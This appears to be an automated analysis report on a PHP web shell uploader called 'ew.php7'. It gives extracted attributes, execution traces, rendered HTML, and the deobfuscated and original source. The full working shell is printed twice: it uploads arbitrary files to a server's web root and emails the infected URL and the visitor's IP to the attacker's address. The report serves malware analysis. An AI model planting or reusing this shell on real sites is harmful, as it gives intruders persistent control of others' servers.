PHP Malware Analysis
ew.php7
md5: edc261694aca27b0500fbaef9089bb22
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- ikirapx@gmail.com (Deobfuscated, Original, Traces)
Environment
- php_uname (Deobfuscated, Original, Traces)
- set_time_limit (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- xSCP-4999 - MBOJO INTERNAL BLACKHAT (Deobfuscated, HTML, Original)
URLs
- http://localhost/uploads/ew.php7 (Traces)
Deobfuscated PHP code
//Powered By REPUBLIK INDONESIA//
//Team : MBOJO INTERNAL BLACKHAT //
<title>xSCP-4999 - MBOJO INTERNAL BLACKHAT </title><center>
<body bgcolor="black">
<br><br><br><br>
<br>
<font color="lime" size="5">> xSCP-4999 <</font>
<font color="red"></center><br><br>
<center>
<?php
echo "MBOJO INTERNAL BLACKHAT - Home Root Uploader<br>";
echo "<b>" . php_uname() . "</b><br>";
echo "<form method='post' enctype='multipart/form-data'>\r\n <input type='file' name='idx_file'>\r\n <input type='submit' name='upload' value='Upload'>\r\n </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
if (is_writable($root)) {
if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://" . $_SERVER['HTTP_HOST'] . "/";
echo "Sukses Cok! -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
} else {
echo "Gagal Upload Di Document Root.";
}
} else {
if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Sukses Upload <b>{$files}</b> Di Folder Ini";
} else {
echo "Gagal mek!";
}
}
}
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'ikirapx@gmail.com, ikirapx@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");Execution traces
data/traces/edc261694aca27b0500fbaef9089bb22_trace-1676240489.0875.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:21:54.985357]
1 0 1 0.000149 393512
1 3 0 0.000246 406232 {main} 1 /var/www/html/uploads/ew.php7 0 0
2 4 0 0.000264 406232 php_uname 0 /var/www/html/uploads/ew.php7 12 0
2 4 1 0.000279 406344
2 4 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/ew.php7 17 $root = '/var/www/html'
1 A /var/www/html/uploads/ew.php7 18 $files = NULL
1 A /var/www/html/uploads/ew.php7 19 $dest = '/var/www/html/'
2 5 0 0.000360 406272 ini_set 0 /var/www/html/uploads/ew.php7 38 2 'output_buffering' 0
2 5 1 0.000376 406344
2 5 R FALSE
2 6 0 0.000390 406272 ini_set 0 /var/www/html/uploads/ew.php7 39 2 'display_errors' 0
2 6 1 0.000404 406344
2 6 R ''
2 7 0 0.000416 406272 set_time_limit 0 /var/www/html/uploads/ew.php7 40 1 0
2 7 1 0.000431 406336
2 7 R FALSE
2 8 0 0.000443 406304 ini_set 0 /var/www/html/uploads/ew.php7 41 2 'memory_limit' '64M'
2 8 1 0.000457 406408
2 8 R '128M'
2 9 0 0.000470 406304 header 0 /var/www/html/uploads/ew.php7 42 1 'Content-Type: text/html; charset=UTF-8'
2 9 1 0.000490 406480
2 9 R NULL
1 A /var/www/html/uploads/ew.php7 43 $tujuanmail = 'ikirapx@gmail.com, ikirapx@gmail.com'
1 A /var/www/html/uploads/ew.php7 44 $x_path = 'http://localhost/uploads/ew.php7'
1 A /var/www/html/uploads/ew.php7 45 $pesan_alert = 'fix http://localhost/uploads/ew.php7 :p *IP Address : [ 127.0.0.1 ]'
2 10 0 0.000541 406648 mail 0 /var/www/html/uploads/ew.php7 46 4 'ikirapx@gmail.com, ikirapx@gmail.com' 'LOGGER' 'fix http://localhost/uploads/ew.php7 :p *IP Address : [ 127.0.0.1 ]' '[ 127.0.0.1 ]'
2 10 1 0.001375 406792
2 10 R FALSE
1 3 1 0.001396 406608
0.001424 314696
TRACE END [2023-02-12 20:21:54.986661]
Generated HTML code
<html><head></head><body bgcolor="black">//Powered By REPUBLIK INDONESIA//
//Team : MBOJO INTERNAL BLACKHAT //
<title>xSCP-4999 - MBOJO INTERNAL BLACKHAT </title><center>
<br><br><br><br>
<br>
<font color="lime" size="5">> xSCP-4999 <</font>
<font color="red"></font></center><font color="red"><br><br>
<center>
MBOJO INTERNAL BLACKHAT - Home Root Uploader<br><b>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</b><br><form method="post" enctype="multipart/form-data">
<input type="file" name="idx_file">
<input type="submit" name="upload" value="Upload">
</form></center></font></body></html>Original PHP code
//Powered By REPUBLIK INDONESIA//
//Team : MBOJO INTERNAL BLACKHAT //
<title>xSCP-4999 - MBOJO INTERNAL BLACKHAT </title><center>
<body bgcolor="black">
<br><br><br><br>
<br>
<font color="lime" size="5">> xSCP-4999 <</font>
<font color="red"></center><br><br>
<center>
<?php
echo "MBOJO INTERNAL BLACKHAT - Home Root Uploader<br>";
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='Upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "Sukses Cok! -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "Gagal Upload Di Document Root.";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Sukses Upload <b>$files</b> Di Folder Ini";
} else {
echo "Gagal mek!";
}
}
}
?>
<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'ikirapx@gmail.com, ikirapx@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>